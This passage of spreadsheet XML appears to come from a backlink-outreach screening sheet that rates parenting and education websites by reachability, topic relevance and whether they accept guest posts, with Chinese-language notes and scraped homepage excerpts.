      <x:c r="D234" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E234" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F234" s="20"/>
      <x:c r="G234" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H234" s="19" t="str"/>
      <x:c r="I234" s="19" t="str"/>
      <x:c r="J234" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K234" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L234" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M234" s="19" t="str">
        <x:v>https://dalfuayleq.org.sa</x:v>
      </x:c>
      <x:c r="N234" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O234" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P234" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q234" s="21" t="str"/>
      <x:c r="R234" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S234" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T234" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://dalfuayleq.org.sa
http://dalfuayleq.org.sa</x:v>
      </x:c>
    </x:row>
    <x:row r="235">
      <x:c r="A235" s="18" t="str">
        <x:v>234</x:v>
      </x:c>
      <x:c r="B235" s="19" t="str">
        <x:v>skyshirts.com</x:v>
      </x:c>
      <x:c r="C235" s="19" t="str">
        <x:v>https://skyshirts.com</x:v>
      </x:c>
      <x:c r="D235" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E235" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F235" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G235" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H235" s="19" t="str">
        <x:v>https://skyshirts.com/</x:v>
      </x:c>
      <x:c r="I235" s="19" t="str">
        <x:v>Skyshirts</x:v>
      </x:c>
      <x:c r="J235" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K235" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L235" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M235" s="19" t="str">
        <x:v>https://skyshirts.com/</x:v>
      </x:c>
      <x:c r="N235" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O235" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P235" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q235" s="21" t="str">
        <x:v>Skyshirts Skip to main content 0 items $ 0.00 Login / Register Sign in Create an Account Username or email address * Required Password * Required Log in Lost your password? Remember me Menu 0 items $ 0.00 Home USA &amp; Canada Europe Mideast Latin America/Caribbean Asia Pacific/Africa Search FREE SHIPPING on orders $120+ (Continental U.S.) Categories USA &amp; Canada Air Cal Air Canada/Trans Canadian Air Force One Air Florida Alaska Allegheny Aloha Airlines American America West Bonanza Airlines Braniff Canadian/Canadian Pacific Capital Chalks International Continental Delta Flying Tigers Frontier Hawaiian Hughes Air West Janet Airlines Jet Blue Midway Airlines Mohawk National North Central Northeas</x:v>
      </x:c>
      <x:c r="R235" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S235" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T235" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://skyshirts.com</x:v>
      </x:c>
    </x:row>
    <x:row r="236">
      <x:c r="A236" s="18" t="str">
        <x:v>235</x:v>
      </x:c>
      <x:c r="B236" s="19" t="str">
        <x:v>homebnc.com</x:v>
      </x:c>
      <x:c r="C236" s="19" t="str">
        <x:v>https://homebnc.com</x:v>
      </x:c>
      <x:c r="D236" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E236" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F236" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G236" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H236" s="19" t="str">
        <x:v>https://homebnc.com/</x:v>
      </x:c>
      <x:c r="I236" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J236" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K236" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L236" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M236" s="19" t="str">
        <x:v>https://homebnc.com/</x:v>
      </x:c>
      <x:c r="N236" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O236" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P236" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q236" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R236" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S236" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T236" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://homebnc.com</x:v>
      </x:c>
    </x:row>
    <x:row r="237">
      <x:c r="A237" s="18" t="str">
        <x:v>236</x:v>
      </x:c>
      <x:c r="B237" s="19" t="str">
        <x:v>topnotchteaching.com</x:v>
      </x:c>
      <x:c r="C237" s="19" t="str">
        <x:v>https://topnotchteaching.com</x:v>
      </x:c>
      <x:c r="D237" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E237" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F237" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G237" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H237" s="19" t="str">
        <x:v>https://topnotchteaching.com/</x:v>
      </x:c>
      <x:c r="I237" s="19" t="str">
        <x:v>Home - Top Notch Teaching</x:v>
      </x:c>
      <x:c r="J237" s="19" t="str">
        <x:v>教师资源博客</x:v>
      </x:c>
      <x:c r="K237" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L237" s="19" t="str">
        <x:v>明确拒绝投稿/链接</x:v>
      </x:c>
      <x:c r="M237" s="19" t="str">
        <x:v>https://topnotchteaching.com/contact/</x:v>
      </x:c>
      <x:c r="N237" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O237" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P237" s="21" t="str">
        <x:v>当前联系页明确不接受 guest post、link insertion 或品牌合作。</x:v>
      </x:c>
      <x:c r="Q237" s="21" t="str">
        <x:v>Top Notch Teaching helps make teacher’s lives easier with resources, advice and learning programs that save time, inspire and motivate. Home - Top Notch Teaching Complete teaching bundles for incredible prices Check our store Home About Members Log In Store Blog Resources Contact Search for: Inspirational Ideas To Help Teachers Thrive Bring some FUN back into spelling! Sign up for the Spelling Game Challenge, and you’ll get a new spelling game each day for 5 days! CLICK HERE! Inspirational Ideas To Help Teachers Thrive Bring some FUN back into spelling! Sign up for the Spelling Game Challenge, and you’ll get a new spelling game each day for 5 days! Click Here! Let’s Get Started Browse the Store Discover our collection of ready-to-use teaching resources designed to save you time and engage your students. Free Resources Access</x:v>
      </x:c>
      <x:c r="R237" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S237" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T237" s="21" t="str">
        <x:v>即使主题相关，也不要发送链接请求。 | 请求: https://topnotchteaching.com</x:v>
      </x:c>
    </x:row>
    <x:row r="238">
      <x:c r="A238" s="18" t="str">
        <x:v>237</x:v>
      </x:c>
      <x:c r="B238" s="19" t="str">
        <x:v>thetoddlerplaybook.com</x:v>
      </x:c>
      <x:c r="C238" s="19" t="str">
        <x:v>https://thetoddlerplaybook.com</x:v>
      </x:c>
      <x:c r="D238" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E238" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F238" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G238" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H238" s="19" t="str">
        <x:v>https://thetoddlerplaybook.com/</x:v>
      </x:c>
      <x:c r="I238" s="19" t="str">
        <x:v>Blog - The Toddler Playbook</x:v>
      </x:c>
      <x:c r="J238" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K238" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L238" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M238" s="19" t="str">
        <x:v>https://thetoddlerplaybook.com/</x:v>
      </x:c>
      <x:c r="N238" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O238" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P238" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q238" s="21" t="str">
        <x:v>Blog - The Toddler Playbook Home About About Contact Legal Montessori at Home What Is Montessori? 12-15 Months 16-19 Months 20-24 Months 2-3 Years Shop Printables Courses More Resources Practical Life Challenge 10 Easy Montessori Activities Select Page The Toddler Playbook The Best Montessori Floor Beds For Toddlers by Meg | Jun 24, 2019 | Lifestyle , Montessori Investing in a Montessori floor bed is a great way to give your toddler more freedom and help them develop independence and self-help skills. Here are some of the best floor bed options for every style and budget! read more How to Teach Your Toddler Manners: 5 Montessori Grace &amp; Courtesy Activities to Try by Meg | Mar 30, 2023 | Mont</x:v>
      </x:c>
      <x:c r="R238" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S238" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T238" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thetoddlerplaybook.com</x:v>
      </x:c>
    </x:row>
    <x:row r="239">
      <x:c r="A239" s="18" t="str">
        <x:v>238</x:v>
      </x:c>
      <x:c r="B239" s="19" t="str">
        <x:v>maydayva.com.au</x:v>
      </x:c>
      <x:c r="C239" s="19" t="str">
        <x:v>https://maydayva.com.au</x:v>
      </x:c>
      <x:c r="D239" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E239" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F239" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G239" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H239" s="19" t="str">
        <x:v>https://holliebarac.com.au/</x:v>
      </x:c>
      <x:c r="I239" s="19" t="str">
        <x:v>Hollie Barac - Designer &amp; Advocate</x:v>
      </x:c>
      <x:c r="J239" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K239" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L239" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M239" s="19" t="str">
        <x:v>https://holliebarac.com.au/</x:v>
      </x:c>
      <x:c r="N239" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O239" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P239" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q239" s="21" t="str">
        <x:v>Taking a break until late 2026 or early 2027, but you can still follow me on social media. Hollie Barac - Designer &amp; Advocate Hello…is it me you’re looking for? Since going back to uni at the beginning of 2024 I’ve been juggling all the things as best as I can, including my business. I’m finally ready to pop this page up and say “Hey, I’ll be back in a few years once I’m finished studying, and when I do come back, I’ll have a fresh new visual brand for you to feast your eyes on.” If you’d like to keep up with the goings on in my life, you’ll see me sharing things occasionally on Instagram, Threads, or Foto. I’m trying to get my portfolio things on Instagram and Foto, but I truly don’t have the time/patience while also studying/parenting/adulting. Okay, that’s it from me for now. S</x:v>
      </x:c>
      <x:c r="R239" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S239" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T239" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://maydayva.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="240">
      <x:c r="A240" s="18" t="str">
        <x:v>239</x:v>
      </x:c>
      <x:c r="B240" s="19" t="str">
        <x:v>wildflowerslc.com</x:v>
      </x:c>
      <x:c r="C240" s="19" t="str">
        <x:v>https://wildflowerslc.com</x:v>
      </x:c>
      <x:c r="D240" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E240" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F240" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G240" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H240" s="19" t="str">
        <x:v>https://wildflowerslc.com/</x:v>
      </x:c>
      <x:c r="I240" s="19" t="str">
        <x:v>Madison's best preschool and childcare | Wildflowers</x:v>
      </x:c>
      <x:c r="J240" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K240" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L240" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M240" s="19" t="str">
        <x:v>https://wildflowerslc.com/</x:v>
      </x:c>
      <x:c r="N240" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O240" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P240" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q240" s="21" t="str">
        <x:v>Now enrolling infants, toddlers, preschool and 4k students in a nurturing environment that is rooted in nature and exploration. Join Today!!! Madison's best preschool and childcare | Wildflowers About Us Meet Our Team Curriculum Snack Menus School Calendar Our Reviews Programs Infant Toddlers Preschool 4K 4K Wraparound &amp; K/1 After School Care Summer Camp Tuition 2026 Tuition 2027 Enrollment Enrollment Forms Assistance City of Madison Accredited Child Care Wisconsin Shares Child Care Subsidy Wisconsin Get Kids Ready Program About Us Meet Our Team Curriculum Snack Menus School Calendar Our Reviews Programs Infant Toddlers Preschool 4K 4K Wraparound &amp; K/1 After School Care Summer Camp Tuition 2026 Tuition 2027 Enrollment Enrollment Forms Assistance City of Madison Accredited Child Care Wisconsin Shares Child Care Subsidy Wisconsin Ge</x:v>
      </x:c>
      <x:c r="R240" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S240" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T240" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://wildflowerslc.com</x:v>
      </x:c>
    </x:row>
    <x:row r="241">
      <x:c r="A241" s="18" t="str">
        <x:v>240</x:v>
      </x:c>
      <x:c r="B241" s="19" t="str">
        <x:v>twinkl.es</x:v>
      </x:c>
      <x:c r="C241" s="19" t="str">
        <x:v>https://twinkl.es</x:v>
      </x:c>
      <x:c r="D241" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E241" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F241" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G241" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H241" s="19" t="str">
        <x:v>https://www.twinkl.es/</x:v>
      </x:c>
      <x:c r="I241" s="19" t="str"/>
      <x:c r="J241" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K241" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L241" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M241" s="19" t="str">
        <x:v>https://www.twinkl.es/</x:v>
      </x:c>
      <x:c r="N241" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O241" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P241" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q241" s="21" t="str"/>
      <x:c r="R241" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S241" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T241" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.es</x:v>
      </x:c>
    </x:row>
    <x:row r="242">
      <x:c r="A242" s="18" t="str">
        <x:v>241</x:v>
      </x:c>
      <x:c r="B242" s="19" t="str">
        <x:v>travelplayexplore.com</x:v>
      </x:c>
      <x:c r="C242" s="19" t="str">
        <x:v>https://travelplayexplore.com</x:v>
      </x:c>
      <x:c r="D242" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E242" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F242" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G242" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H242" s="19" t="str">
        <x:v>https://travelplayexplore.com/</x:v>
      </x:c>
      <x:c r="I242" s="19" t="str">
        <x:v>Travel Play Explore</x:v>
      </x:c>
      <x:c r="J242" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K242" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L242" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M242" s="19" t="str">
        <x:v>https://travelplayexplore.com/</x:v>
      </x:c>
      <x:c r="N242" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O242" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P242" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q242" s="21" t="str">
        <x:v>Travel Play Explore Skip to content About Us Home Blog Destinations Queensland New South Wales Victoria Type of Adventure Adventure Days Camping Road Trips Hotels and Accomodation Nature Play Trip Planning Itineraries Packing &amp; Gear Budget Travel Travel with Kids Tips Homeschool Adventures Subscribe Why Webbs Break Is One of Our Go-To Camping Spots in Queensland By Casey Patch If your kids love water, fresh air and the freedom to explore, Webbs Break at Mount Archer is the kind of camping spot that stays with you. For our family,… Read the blog Why Webbs Break Is One of Our Go-To Camping Spots in Queensland 21 Car Activities for Road Trips with Kids in Australia (Tried &amp; Tested) By Casey Pat</x:v>
      </x:c>
      <x:c r="R242" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S242" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T242" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://travelplayexplore.com</x:v>
      </x:c>
    </x:row>
    <x:row r="243">
      <x:c r="A243" s="18" t="str">
        <x:v>242</x:v>
      </x:c>
      <x:c r="B243" s="19" t="str">
        <x:v>lowfeye.top</x:v>
      </x:c>
      <x:c r="C243" s="19" t="str">
        <x:v>https://lowfeye.top</x:v>
      </x:c>
      <x:c r="D243" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E243" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F243" s="20"/>
      <x:c r="G243" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H243" s="19" t="str"/>
      <x:c r="I243" s="19" t="str"/>
      <x:c r="J243" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K243" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L243" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M243" s="19" t="str">
        <x:v>https://lowfeye.top</x:v>
      </x:c>
      <x:c r="N243" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O243" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P243" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q243" s="21" t="str"/>
      <x:c r="R243" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S243" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T243" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://lowfeye.top
http://lowfeye.top</x:v>
      </x:c>
    </x:row>
    <x:row r="244">
      <x:c r="A244" s="18" t="str">
        <x:v>243</x:v>
      </x:c>
      <x:c r="B244" s="19" t="str">
        <x:v>jennasrootz.com</x:v>
      </x:c>
      <x:c r="C244" s="19" t="str">
        <x:v>https://jennasrootz.com</x:v>
      </x:c>
      <x:c r="D244" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E244" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F244" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G244" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H244" s="19" t="str">
        <x:v>https://jennasrootz.com/</x:v>
      </x:c>
      <x:c r="I244" s="19" t="str">
        <x:v>Jenna's Rootz • Lakeland, FL • Minimizing the Chance of Relapse</x:v>
      </x:c>
      <x:c r="J244" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K244" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L244" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M244" s="19" t="str">
        <x:v>https://jennasrootz.com/</x:v>
      </x:c>
      <x:c r="N244" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O244" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P244" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q244" s="21" t="str">
        <x:v>Jenna’s Rootz understands that the road to recovery for women men and families in recovery is hampered by the everyday needs of their children. It is our... Jenna's Rootz • Lakeland, FL • Minimizing the Chance of Relapse View our Community Resource Guide! Home Jenna’s Story Our Team Contact Us Donate Get Assistance Select Page Minimizing the chance of relapse through the ongoing support for the children of mothers and fathers in recovery. Get Assistance What is Jenna’s Rootz? On Friday, March 16, 2018 the world lost a truly beautiful and colorful woman: Jenna Kylie Gibson. Jenna’s story isn’t the easiest to tell, however it is one that inspires us to help other families who may be fighting through life with an addict loved one. We understand more than anyone that your loved one who may be going through a hard time is a beautiful person who truly</x:v>
      </x:c>
      <x:c r="R244" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S244" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T244" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://jennasrootz.com</x:v>
      </x:c>
    </x:row>
    <x:row r="245">
      <x:c r="A245" s="18" t="str">
        <x:v>244</x:v>
      </x:c>
      <x:c r="B245" s="19" t="str">
        <x:v>twinkl.gr</x:v>
      </x:c>
      <x:c r="C245" s="19" t="str">
        <x:v>https://twinkl.gr</x:v>
      </x:c>
      <x:c r="D245" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E245" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F245" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G245" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H245" s="19" t="str">
        <x:v>https://www.twinkl.gr/</x:v>
      </x:c>
      <x:c r="I245" s="19" t="str"/>
      <x:c r="J245" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K245" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L245" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M245" s="19" t="str">
        <x:v>https://www.twinkl.gr/</x:v>
      </x:c>
      <x:c r="N245" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O245" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P245" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q245" s="21" t="str"/>
      <x:c r="R245" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S245" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T245" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.gr</x:v>
      </x:c>
    </x:row>
    <x:row r="246">
      <x:c r="A246" s="18" t="str">
        <x:v>245</x:v>
      </x:c>
      <x:c r="B246" s="19" t="str">
        <x:v>frasersfunhouse.com</x:v>
      </x:c>
      <x:c r="C246" s="19" t="str">
        <x:v>https://frasersfunhouse.com</x:v>
      </x:c>
      <x:c r="D246" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E246" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F246" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G246" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H246" s="19" t="str">
        <x:v>https://frasersfunhouse.com/</x:v>
      </x:c>
      <x:c r="I246" s="19" t="str">
        <x:v>Fraser’s Fun House – Lifestyle | Parenting | Family</x:v>
      </x:c>
      <x:c r="J246" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K246" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L246" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M246" s="19" t="str">
        <x:v>https://frasersfunhouse.com/</x:v>
      </x:c>
      <x:c r="N246" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O246" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P246" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q246" s="21" t="str">
        <x:v>Lifestyle | Parenting | Family Fraser’s Fun House – Lifestyle | Parenting | Family Skip to content Fraser’s Fun House Lifestyle | Parenting | Family Menu Home About Me Work With Me Disclaimer &amp; Privacy Nights Out For Parents That Don’t Have To Include Going To The Pub Lifestyle &amp;middot; Parenting Nights Out For Parents That Don’t Have To Include Going To The Pub September 26, 2025 September 26, 2025 Melanie Fraser Leave a comment While it’s easy to often get swept along by the sheer tide of responsibility, focusing on taking care of your family first and foremost, alongside work, education, or any other burdens you have to carry, it’s important to stop and appreciate what you have as well. This means not just spending tim</x:v>
      </x:c>
      <x:c r="R246" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S246" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T246" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://frasersfunhouse.com</x:v>
      </x:c>
    </x:row>
    <x:row r="247">
      <x:c r="A247" s="18" t="str">
        <x:v>246</x:v>
      </x:c>
      <x:c r="B247" s="19" t="str">
        <x:v>localgymsandfitness.com</x:v>
      </x:c>
      <x:c r="C247" s="19" t="str">
        <x:v>https://localgymsandfitness.com</x:v>
      </x:c>
      <x:c r="D247" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E247" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F247" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G247" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H247" s="19" t="str">
        <x:v>https://www.localgymsandfitness.com/</x:v>
      </x:c>
      <x:c r="I247" s="19" t="str">
        <x:v>LocalGymsAndFitness</x:v>
      </x:c>
      <x:c r="J247" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K247" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L247" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M247" s="19" t="str">
        <x:v>https://www.localgymsandfitness.com/</x:v>
      </x:c>
      <x:c r="N247" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O247" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P247" s="21" t="str">
